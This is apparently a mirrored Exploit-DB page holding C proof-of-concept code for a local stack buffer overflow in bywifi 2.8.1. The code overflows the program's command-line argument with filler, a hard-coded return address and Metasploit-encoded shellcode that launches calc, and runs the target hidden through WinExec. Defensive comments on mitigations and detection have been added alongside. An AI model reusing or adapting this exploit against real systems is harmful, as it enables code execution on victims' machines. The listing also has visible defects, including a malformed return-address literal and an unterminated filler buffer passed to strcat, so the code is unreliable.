Bywifi 2.8.1 – Local Stack Buffer Overflow

  • 作者: anonymous
    日期: 2011-01-01
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15888/
  • /*
    # Exploit Title: [bywifi 2.8.1 stackbuffer overflow]
    # Author: [Anonymous]
    # Software Link: [bywifi.com]
    # Version: [2.8.1]
    # Tested on: [windows xp Professional French]
    # CVE : [N/a]
    */
    
    #include <windows.h>
    #include <string.h>
    #include <stdio.h>
    /*
     * Proof-of-concept driver for the bywifi 2.8.1 report in the header above.
     * It builds one long command line for bywifi.exe (program name, 260 filler
     * bytes, a 4-byte value the author labels "ret addr", then an encoded
     * payload) and starts it with WinExec().
     *
     * Defender reading: the layout suggests that bywifi.exe copies its
     * command-line argument into a fixed-size stack buffer without a length
     * check. NOTE(review): the vulnerable routine is not shown on this page;
     * confirm against the vendor binary.
     * Mitigation: bound the copy in the target and build it with stack cookies
     * (/GS), DEP (/NXCOMPAT) and ASLR (/DYNAMICBASE).
     * Detection: process-creation telemetry showing bywifi.exe started with an
     * argument several hundred bytes long that contains non-printable bytes,
     * or bywifi.exe creating a child process.
     * A run of this listing that produces no crash is not evidence that a
     * build is unaffected; review the target's argument handling instead.
     */
    int main()
    {
    // Command-line buffer, pre-filled with the target program name and a space.
    char exploit[700]="bywifi.exe "; 
    // Hard-coded absolute address chosen by the author. An absolute address is
    // tied to the exact system the author tested on (header: Windows XP
    // Professional French) and is invalidated by ASLR-randomised module bases.
    char ret[] = "x5D\x38\x82\x7C";
    // 260 bytes of 0x41 ('A') filler placed ahead of the 4-byte value above.
    char overflow[260];
    for(int i=0;i<260;i++){
    overflow[i]=0x41;
    }
    /*
    * windows/exec - 144 bytes
    * http://www.metasploit.com
    * Encoder: x86/shikata_ga_nai
    * EXITFUNC=process, CMD=calc
    */
    // Per the generator header above, the payload runs CMD=calc and then exits
    // the process: a benign marker showing that execution was redirected.
    // These bytes are encoder output, so a byte signature on them is brittle;
    // alert on the behaviour (unexpected child of bywifi.exe) instead.
    char shellcode[] =
    "\xbf\xdb\xf9\x8c\x6d\x31\xc9\xb1\x1e\xda\xcd\xd9\x74\x24\xf4"
    "\x58\x31\x78\x0f\x03\x78\x0f\x83\xe8\x27\x1b\x79\x91\x3f\x98"
    "\x82\x6a\xbf\xaa\xc6\x56\x34\xd0\xcd\xde\x4b\xc6\x45\x51\x53"
    "\x93\x05\x4e\x62\x48\xf0\x05\x50\x05\x02\xf4\xa9\xd9\x9c\xa4"
    "\x4d\x19\xea\xb3\x8c\x50\x1e\xbd\xcc\x8e\xd5\x86\x84\x74\x12"
    "\x8c\xc1\xfe\x45\x4a\x08\xea\x1c\x19\x06\xa7\x6b\x42\x0a\x36"
    "\x87\xf6\x2e\xb3\x56\xe2\xc7\x9f\x7c\xf0\x14\x40\x4c\x0e\xfa"
    "\x29\xca\x65\xbc\xe5\x99\x3a\x4c\x8d\xee\xa6\xe1\x1a\x66\xdf"
    "\x70\xe4\xf4\x1f\xe8\x45\x93\x6f\x66\x61\x3c\xf8\xee\x94\x48"
    "\xf6\x59\x96\xaa\x64\x04\x04\x56\x6b";
    printf("Exploiting ......\n");
    // Assemble the argument in order: filler, the 4-byte value, the payload.
    strcat(exploit, overflow);
    strcat(exploit, ret);
    strcat(exploit, shellcode);
    // Starts bywifi.exe with the assembled command line; uCmdShow 0 is SW_HIDE.
    // The return value is ignored, so the message printed next says nothing
    // about whether the launch succeeded or the target misbehaved.
    WinExec(exploit,0);
    printf("Exploitation Finished\n");
    return 0;
    }